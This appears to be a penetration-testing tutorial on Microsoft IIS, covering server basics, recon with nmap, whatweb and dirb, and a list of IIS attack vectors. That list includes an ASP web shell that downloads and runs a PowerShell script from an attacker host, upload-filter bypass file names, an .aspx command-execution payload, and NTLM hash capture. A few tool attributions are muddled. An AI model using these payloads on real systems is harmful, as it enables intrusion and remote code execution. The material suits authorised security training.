Skip to content

01. HTTP IIS

What is HTTP IIS?

IIS (Internet Information Services) is a web server developed by Microsoft that runs on Windows operating systems. It uses the HTTP protocol (and optionally HTTPS) to serve web pages, host applications, and manage content over the internet or intranet.

Components of HTTP IIS

  1. HTTP Listener:

    • Listens on port 80 (or 443 for HTTPS).

    • Handles incoming HTTP requests and forwards them to the correct application.

  2. Worker Process (w3wp.exe):

    • Executes the web application (e.g., ASP.NET).

    • Processes requests and sends responses back to clients.

  3. Application Pool:

    • Isolates applications to improve stability and security.

    • Each app pool runs in a separate worker process.

  4. Static and Dynamic Content:

    • Serves static files: .html, .css, .js, images, etc.

    • Handles dynamic content using .asp, .aspx, .php, etc. via configured modules.

How HTTP Works in IIS

  1. Client sends a request:

    GET /index.html HTTP/1.1
Host: example.com

  2. IIS receives the request via its HTTP listener.

  3. Routing to Application Pool:

    • IIS routes the request to the correct site and application pool.

  4. Execution:

    • For static content: Directly served.

    • For dynamic content: Passed to appropriate handlers like ASP.NET or PHP.

  5. Response:

    HTTP/1.1 200 OK
Server: Microsoft-IIS/10.0
Content-Type: text/html

  6. Client receives the rendered page.

IIS Server Signature in Headers

You can identify IIS using tools like http or browser Developer Tools. Look at the headers:

HTTP/1.1 200 OK
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET

This shows:

  • The web server is IIS 10.0

  • The backend is ASP.NET

Common File Types Served by IIS

File Type Purpose Handled By
.html / .htm Static pages IIS Static Content Module
.asp Classic ASP scripts Classic ASP Engine
.aspx ASP.NET Web Forms .NET Framework
.web.config Configuration IIS + ASP.NET
.php PHP pages (If PHP module is installed)

Security Notes for IIS HTTP

  • Disable directory browsing to prevent exposing files.

  • Restrict HTTP methods (e.g., block PUT, DELETE).

  • Use proper authentication (Basic, NTLM, Windows Auth).

  • Enable HTTPS (TLS) to encrypt traffic.

1. Initial Nmap Scan

Command:

nmap <IP Address>

Purpose:

  • Quickly check which ports are open.

  • Look for port 80 (HTTP) or 443 (HTTPS).

Example:

nmap 192.168.1.5

2. Detailed Nmap Service and OS Detection

Command:

nmap <IP Address> -sV -O

Purpose:

  • Detects service versions.

  • Identifies the operating system.

  • Helps confirm the use of Microsoft IIS.

Example Output:

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
OS: Windows Server 2016

This confirms that the target is running IIS.

3. Check the Web Server in Browser

Steps:

  • Open your browser.

  • Enter the IP address:

http://192.168.1.5

You might see:

  • Default IIS welcome page.

  • Custom application hosted via IIS.

4. Fingerprint Web Server with WhatWeb

Command:

whatweb <IP Address>

Purpose:

  • Detects web server software and technologies.

  • Identifies IIS and possible scripting languages (e.g., ASP.NET).

Example:

whatweb 192.168.1.5

Output:

Microsoft-IIS/10.0, ASP.NET, HTML5

This confirms IIS with ASP.NET backend.

5. Inspect Web Response with HTTPie

Command:

http <IP Address>

Purpose:

  • Sends a GET request and returns headers and body.

  • Can reveal redirections, headers, and cookies.

Example:

http 192.168.1.5

Sample Output:

HTTP/1.1 200 OK
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET

You now know:

  • IIS version.

  • ASP.NET is enabled.

6. Directory Bruteforce with Dirb

Command:

dirb http://<IP Address>

Purpose:

  • Discover hidden directories like:

    • /admin/

    • /aspnet_client/

    • /web.config

Example:

dirb http://192.168.1.5

Useful for IIS:

  • May expose .aspx, .asp, or configuration files.

7. Browse IIS Site in CLI using Browsh

Command:

browsh --startup-url http://<IP Address>

Purpose:

  • Browse IIS site in terminal.

  • Good for headless or SSH environments.

Example:

browsh --startup-url http://192.168.1.5

IIS Recon Workflow (Recap)

Step Tool Purpose
1 nmap -sV -O Detect IIS server and OS
2 Browser or browsh View site
3 whatweb Detect technologies
4 http View headers (IIS version, ASP.NET)
5 dirb Find hidden directories/files

IIS-Specific Attack Vectors & Exploitation Techniques

1. Hidden ASP/ASPX Pages Enumeration

Purpose:
IIS servers often host .asp or .aspx pages that may not be linked publicly but are sensitive (e.g., admin panels, login portals).

Tool:

dirb http://<IP> /usr/share/wordlists/dirb/common.txt -X .asp,.aspx

Tip: You can also use ffuf or gobuster.

2. web.config File Disclosure

Vulnerability:
If improperly configured, IIS may leak the web.config file which contains database credentials, debugging settings, etc.

Test:

http://<IP>/web.config

Payload Example in HTTPie:

http http://192.168.1.5/web.config

3. NTLM Authentication (SMB/Web)

Vulnerability:
IIS sometimes uses NTLM-based authentication, which can:

  • Trigger hash leaks

  • Be relayed via tools like Responder, NTLMRelayX, or Impacket

Check via headers:

http http://<IP>

Look for:

WWW-Authenticate: NTLM

Exploit:
Capture NTLM hashes by forcing authentication to attacker-controlled SMB/HTTP server.

4. IIS Short File Name Enumeration (8.3 Format)

Description:
Older versions of IIS may expose 8.3 short names (DOS-style filenames like admin~1.aspx) using special URL manipulation.

Tool:
IIS Short Name Scanner (Fuzz Faster U Fool)

Example:

python IISShortNameScanner.py -u http://192.168.1.5

Goal:
Reveal filenames like admin~1.aspx, allowing targeted attacks.

5. Misconfigured .NET Debug/Stack Traces

Check:
Send malformed requests or non-existent routes:

http http://<IP>/nonexistent.aspx

Look for:

  • ASP.NET yellow error pages

  • Stack traces

  • File paths

  • Version info

6. Upload & Execute ASP Shells (If Upload is Enabled)

Payload File Example:
Create a reverse shell in shell.asp:

<%
 Set s=CreateObject("WScript.Shell")
 s.Run "powershell -nop -c IEX(New-Object Net.WebClient).DownloadString('http://attacker/shell.ps1')"
%>

Steps:

  1. Upload .asp shell (if vulnerable file upload).

  2. Access it via:

http://<IP>/uploads/shell.asp

7. Bypass Upload Filters (Double Extensions)

Techniques:

  • shell.asp;.jpg

  • shell.asp%20

  • shell.asp::$DATA

Check if IIS processes ASP code in those files.

8. Command Execution via .asp / .aspx RCE

If RCE is possible (e.g., via file upload or deserialization), chain with a reverse shell payload.

Example payload in .aspx:

<%@ Page Language="C#" %>
<% System.Diagnostics.Process.Start("cmd.exe", "/c whoami"); %>

9. IIS Internal IP Disclosure via Headers

Check for:

curl -I http://<IP>

Headers to Inspect:

  • X-Forwarded-For

  • Via

  • X-Client-IP

These may reveal internal infrastructure details or proxy chains.

10. Enumerate ASP.NET ViewState for Deserialization

If you find __VIEWSTATE values in forms, and ViewStateMAC is disabled, it may be vulnerable to .NET deserialization attacks.

Tool:

Exploit Example:
Inject crafted payloads into __VIEWSTATE to trigger RCE.

Helpful Tools for IIS/ASP Testing

Tool Usage
Nmap -sV -O Detect IIS and services
whatweb Identify IIS version and ASP.NET
http / curl Analyze headers and responses
dirb, gobuster, ffuf Enumerate .asp, .aspx, web.config
YSoSerial.Net ASP.NET ViewState deserialization
IIS ShortName Scanner Discover hidden files (8.3)
Burp Suite Web app testing and ViewState tampering
Responder / Impacket NTLM hash capture/relay